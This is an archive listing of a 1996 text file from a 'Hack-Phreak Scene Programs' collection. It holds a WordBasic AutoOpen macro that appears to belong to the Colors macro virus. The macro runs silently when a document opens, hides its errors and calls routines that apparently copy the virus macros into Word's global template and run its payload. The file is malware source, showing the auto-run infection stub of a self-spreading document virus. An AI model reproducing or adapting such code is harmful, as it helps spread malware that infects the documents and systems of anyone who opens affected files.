home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / MVUPDAT3.ZIP / RAINBOW.ZIP / COLORS.ZIP / COLORS4.TXT < prev    next >
Text File  |  1996-04-13  |  387b  |  20 lines

  1. Macro AutoOpen
  2.  
  3. Sub MAIN
  4.         On Error Goto ErrorRoutine
  5.         
  6.         If macros.bDebug Then MsgBox "start AutoOpen"
  7.  
  8.         macros.SavToGlobal(NomFichier$())
  9.         macros.objectiv
  10.         Goto Done
  11.  
  12. ErrorRoutine:
  13.         On Error Goto Done
  14.         If macros.bDebug Then
  15.                 MsgBox "error " + Str$(Err) + " occurred"
  16.         End If
  17.  
  18. Done:
  19. End Sub
  20.